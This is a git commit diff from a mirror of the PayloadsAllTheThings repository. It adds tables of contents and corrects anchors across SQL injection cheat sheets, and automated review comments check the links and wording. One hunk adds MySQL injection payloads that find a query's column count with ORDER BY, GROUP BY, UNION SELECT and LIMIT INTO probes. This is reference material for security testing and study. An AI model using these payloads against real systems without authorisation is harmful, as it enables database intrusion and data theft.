mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #116 from nizam0906/master
Added More Updates in SQL Injection
This commit is contained in:
commit
55d1731897
@ -2,6 +2,14 @@
|
|||||||
|
|
||||||
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Cassandra comment](#cassandra-comment)
|
||||||
|
* [Cassandra - Login Bypass](#cassandra---login-bypass)
|
||||||
|
* [Login Bypass 0](#login-bypass-0)
|
||||||
|
* [Login Bypass 1](#login-bypass-1)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## Cassandra comment
|
## Cassandra comment
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
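Review bot: the new Summary links `#cassandra---login-bypass`, `#login-bypass-0`, `#login-bypass-1` and `#references`, but the only heading visible as context in this hunk is `## Cassandra comment`, so those four headings should be confirmed to exist with exactly that wording, otherwise the anchors are dead on arrival. Also, the description blockquote (`> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system`) carries no source attribution, while the Hibernate file touched by this same patch ends its quote with `- Wikipedia`; adding the same attribution keeps the two files consistent.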
@ -1,6 +1,12 @@
|
|||||||
# Hibernate Query Language Injection
|
# Hibernate Query Language Injection
|
||||||
|
|
||||||
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
|
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [HQL Comments](#hql-comments)
|
||||||
|
* [HQL List Columns](#hql-list-columns)
|
||||||
|
* [HQL Error Based](#hql-error-based)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## HQL Comments
|
## HQL Comments
|
||||||
|
|
||||||
|
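Review bot: only `## HQL Comments` is visible as context for the added Summary; `#hql-list-columns`, `#hql-error-based` and `#references` need body headings with matching text, which this hunk does not show. Worth verifying before merge, since the MSSQL part of this same patch exists precisely to repair anchors that drifted away from their headings.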
@ -5,18 +5,18 @@
|
|||||||
* [MSSQL comments](#mssql-comments)
|
* [MSSQL comments](#mssql-comments)
|
||||||
* [MSSQL version](#mssql-version)
|
* [MSSQL version](#mssql-version)
|
||||||
* [MSSQL database name](#mssql-database-name)
|
* [MSSQL database name](#mssql-database-name)
|
||||||
* [MSSQL List databases](#mssql-list-database)
|
* [MSSQL List databases](#mssql-list-databases)
|
||||||
* [MSSQL List columns](#mssql-list-columns)
|
* [MSSQL List columns](#mssql-list-columns)
|
||||||
* [MSSQL List tables](#mssql-list-tables)
|
* [MSSQL List tables](#mssql-list-tables)
|
||||||
* [MSSQL Extract user/password](#mssql-extract-user-password)
|
* [MSSQL Extract user/password](#mssql-extract-userpassword)
|
||||||
* [MSSQL Union Based](#mssql-union-based)
|
* [MSSQL Union Based](#mssql-union-based)
|
||||||
* [MSSQL Error Based](#mssql-error-based)
|
* [MSSQL Error Based](#mssql-error-based)
|
||||||
* [MSSQL Blind Based](#mssql-blind-based)
|
* [MSSQL Blind Based](#mssql-blind-based)
|
||||||
* [MSSQL Time Based](#mssql-time-based)
|
* [MSSQL Time Based](#mssql-time-based)
|
||||||
* [MSSQL Stacked query](#mssql-stack-query)
|
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
|
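Review bot: the last entry's anchor changes from `#mssql-make-user-dba` to `#mssql-make-user-dba-db-admin`, which implies the heading reads something like `MSSQL Make user DBA (DB admin)`, yet the link text stays `MSSQL Make user DBA`; either update the link text to mirror the heading or leave the anchor alone. The other three fixes (`#mssql-list-databases`, `#mssql-extract-userpassword`, `#mssql-stacked-query`) follow GitHub's slug rules (lower case, spaces to hyphens, punctuation such as `/` dropped) and look right, provided the body heading really is `## MSSQL Stacked query` and not the older `Stack query` wording the previous anchor pointed at.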
@ -3,10 +3,10 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [MYSQL Comment](#mysql-comment)
|
* [MYSQL Comment](#mysql-comment)
|
||||||
* [Detect columns number](#detect-columns-number)
|
|
||||||
* [MYSQL Union Based](#mysql-union-based)
|
* [MYSQL Union Based](#mysql-union-based)
|
||||||
* [Extract database with information_schema](#extract-database-with-information-schema)
|
* [Detect columns number](#detect-columns-number)
|
||||||
* [Extract data without information_schema](#extract-data-without-information-schema)
|
* [Extract database with information_schema](#extract-database-with-information_schema)
|
||||||
|
* [Extract columns name without information_schema](#extract-columns-name-without-information_schema)
|
||||||
* [Extract data without columns name](#extract-data-without-columns-name)
|
* [Extract data without columns name](#extract-data-without-columns-name)
|
||||||
* [MYSQL Error Based](#mysql-error-based)
|
* [MYSQL Error Based](#mysql-error-based)
|
||||||
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
||||||
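Review bot: the entry `* [Extract data without information_schema](#extract-data-without-information-schema)` is removed and `* [Extract columns name without information_schema](#extract-columns-name-without-information_schema)` takes its place, but no hunk in this patch renames the corresponding body heading, so the new anchor is dead unless that heading was already changed in an earlier commit; please confirm. Moving `Detect columns number` under `MYSQL Union Based` matches the new `### Detect columns number` subsection added later in this file, and keeping the underscore in `#extract-database-with-information_schema` is correct, since GitHub slugs preserve underscores.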
@ -15,10 +15,10 @@
|
|||||||
* [MYSQL Blind](#mysql-blind)
|
* [MYSQL Blind](#mysql-blind)
|
||||||
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
||||||
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
||||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set)
|
||||||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||||
* [MYSQL Time Based](#mysql-time-based)
|
* [MYSQL Time Based](#mysql-time-based)
|
||||||
* [Using SLEEP in a subselect](#using-asleep-in-a-subselect)
|
* [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
|
||||||
* [Using conditional statements](#using-conditional-statements)
|
* [Using conditional statements](#using-conditional-statements)
|
||||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||||
* [MYSQL Current queries](#mysql-current-queries)
|
* [MYSQL Current queries](#mysql-current-queries)
|
||||||
@ -46,17 +46,76 @@
|
|||||||
|
|
||||||
## MYSQL Union Based
|
## MYSQL Union Based
|
||||||
|
|
||||||
### Extract database with information_schema
|
### Detect columns number
|
||||||
|
|
||||||
First you need to know the number of columns, you can use `order by`.
|
First you need to know the number of columns
|
||||||
|
|
||||||
|
##### Using `order by` or `group by`
|
||||||
|
|
||||||
|
Keep incrementing the number until you get a False response.
|
||||||
|
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
order by 1
|
1' ORDER BY 1--+ #True
|
||||||
order by 2
|
1' ORDER BY 2--+ #True
|
||||||
order by 3
|
1' ORDER BY 3--+ #True
|
||||||
...
|
1' ORDER BY 4--+ #False - Query is only using 3 columns
|
||||||
order by XXX
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
```
|
```
|
||||||
|
or
|
||||||
|
```sql
|
||||||
|
1' GROUP BY 1--+ #True
|
||||||
|
1' GROUP BY 2--+ #True
|
||||||
|
1' GROUP BY 3--+ #True
|
||||||
|
1' GROUP BY 4--+ #False - Query is only using 3 columns
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `order by` or `group by` Error Based
|
||||||
|
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
|
||||||
|
```sql
|
||||||
|
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||||
|
|
||||||
|
# Unknown column '4' in 'order clause'
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```sql
|
||||||
|
1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||||
|
|
||||||
|
# Unknown column '4' in 'group statement'
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `UNION SELECT` Error Based
|
||||||
|
This method works if error showing is enabled
|
||||||
|
```sql
|
||||||
|
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `LIMIT INTO` Error Based
|
||||||
|
This method works if error showing is enabled.
|
||||||
|
|
||||||
|
It is useful for finding the number of columns when the injection point is after a LIMIT clause.
|
||||||
|
```sql
|
||||||
|
1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns
|
||||||
|
1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
|
||||||
|
This works if you know the table name you're after and error showing is enabled.
|
||||||
|
|
||||||
|
It will return the amount of columns in the table, not the query.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)
|
||||||
|
# This error means query uses 3 column
|
||||||
|
#-1' UNION SELECT 1,2,3--+ True
|
||||||
|
```
|
||||||
|
### Extract database with information_schema
|
||||||
|
|
||||||
Then the following codes will extract the databases'name, tables'name, columns'name.
|
Then the following codes will extract the databases'name, tables'name, columns'name.
|
||||||
|
|
||||||
|
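Review bot: the comment under `1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)` says `# This error means query uses 3 column`, which contradicts the sentence two lines above it (`It will return the amount of columns in the table, not the query.`); reword it to say that the `Users` table has 3 columns, and drop the trailing `#-1' UNION SELECT 1,2,3--+ True` from that block, because a table's column count says nothing about how many columns the injected query selects. Smaller points in the same hunk: `funcionality` should be `functionality`; the annotation style is inconsistent (`1' ORDER BY 4--+ #False ...` puts the note after the payload, whereas `#-1' UNION SELECT 1,2,3--+ True` puts a `#` in front of the payload itself, which reads as if the payload were commented out); and the new subsection headings jump from `###` to `#####`, skipping a level, so `####` would keep the outline consistent with the rest of the file.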
@ -1,5 +1,18 @@
|
|||||||
# Oracle SQL Injection
|
# Oracle SQL Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Oracle SQL version](#oracle-sql-version)
|
||||||
|
* [Oracle SQL database name](#oracle-sql-database-name)
|
||||||
|
* [Oracle SQL List databases](#oracle-sql-list-databases)
|
||||||
|
* [Oracle SQL List columns](#oracle-sql-list-columns)
|
||||||
|
* [Oracle SQL List tables](#oracle-sql-list-tables)
|
||||||
|
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||||
|
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||||
|
* [Oracle SQL Time Based](#oracle-sql-time-based)
|
||||||
|
* [Oracle SQL Command execution](#oracle-sql-command-execution)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## Oracle SQL version
|
## Oracle SQL version
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
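Review bot: the added Summary links nine sections but this hunk shows only `## Oracle SQL version` as context; the second hunk of this file renames `List Column` to `List Columns` so that `#oracle-sql-list-columns` resolves, and the remaining anchors (`#oracle-sql-list-databases`, `#oracle-sql-command-execution`, `#references`, ...) should be checked against their headings the same way before merge.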
@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
|||||||
SELECT DISTINCT owner FROM all_tables;
|
SELECT DISTINCT owner FROM all_tables;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Column
|
## Oracle SQL List Columns
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||||
|
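Review bot: the rename to `## Oracle SQL List Columns` is what makes the Summary's `#oracle-sql-list-columns` resolve, so it belongs in this patch. Since this context is being touched anyway, the sample `SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';` deserves a one-line caveat: Oracle stores unquoted identifiers in upper case, so `'blah'` matches nothing unless the table was created with a quoted lower-case name; `WHERE table_name = 'BLAH'` (or `UPPER(table_name) = UPPER('blah')`) is the form that works by default.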
@ -20,8 +20,8 @@
|
|||||||
* [PostgreSQL File Read](#postgresql-file-read)
|
* [PostgreSQL File Read](#postgresql-file-read)
|
||||||
* [PostgreSQL File Write](#postgresql-file-write)
|
* [PostgreSQL File Write](#postgresql-file-write)
|
||||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||||
* [CVE-2019–9193](#cve-2019–9193)
|
* [CVE-2019–9193](#cve-20199193)
|
||||||
* [Using libc.so.6](#using-libc-so-6)
|
* [Using libc.so.6](#using-libcso6)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## PostgreSQL Comments
|
## PostgreSQL Comments
|
||||||
|
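Review bot: the heading `CVE-2019–9193` uses an en dash (U+2013), which is why the anchor ended up as `#cve-20199193`; the identifier is `CVE-2019-9193` with an ASCII hyphen. Fix the heading and the link text instead of encoding the typo into the anchor, after which the slug becomes `#cve-2019-9193`. The `#using-libcso6` fix for `Using libc.so.6` is correct (dots are dropped from slugs).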
@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||||||
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||||
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
|
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
|
||||||
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
|
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
|
||||||
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
|
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
|
||||||
* [Second order injection](#second-order-injection)
|
* [Second order injection](#second-order-injection)
|
||||||
* [Shell](#shell)
|
* [Shell](#shell)
|
||||||
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
|
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
|
||||||
@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||||||
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
|
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
|
||||||
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
||||||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||||
* [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
|
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||||
* [Authentication bypass](#authentication-bypass)
|
* [Authentication bypass](#authentication-bypass)
|
||||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||||
* [Routed injection](#routed-injection)
|
* [Routed injection](#routed-injection)
|
||||||
|
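Review bot: `#general-tamper-option-and-tampers-list` is the right slug for `General tamper option and tamper's list` (the apostrophe is dropped). The unchanged neighbour `* [Polyglot injection](#polyglot-injection-multicontext)` has the same link-text/anchor mismatch this patch fixes elsewhere: the anchor implies a heading `Polyglot injection (multicontext)` while the text says only `Polyglot injection`; worth aligning in the same pass.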
@ -1,5 +1,18 @@
|
|||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [SQLite comments](#sqlite-comments)
|
||||||
|
* [SQLite version](#sqlite-version)
|
||||||
|
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
|
||||||
|
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
|
||||||
|
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
||||||
|
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||||
|
* [Boolean - Extract info](#boolean---extract-info)
|
||||||
|
* [Time based](#time-based)
|
||||||
|
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||||
|
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||||
|
* [References](#references)
|
||||||
## SQLite comments
|
## SQLite comments
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
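Review bot: the Summary's final entry `* [References](#references)` runs straight into `## SQLite comments` with no blank line between them, unlike the Oracle and HQL Summaries added by this same patch; add the blank line so the list is terminated the same way in every file (some Markdown renderers otherwise attach the heading to the last list item). The two long anchors `#integerstring-based---extract-table-name` and `#remote-command-execution-using-sqlite-command---load_extension` follow GitHub's slug rules (`/` dropped, ` - ` becoming `---`, underscore kept) and look correct.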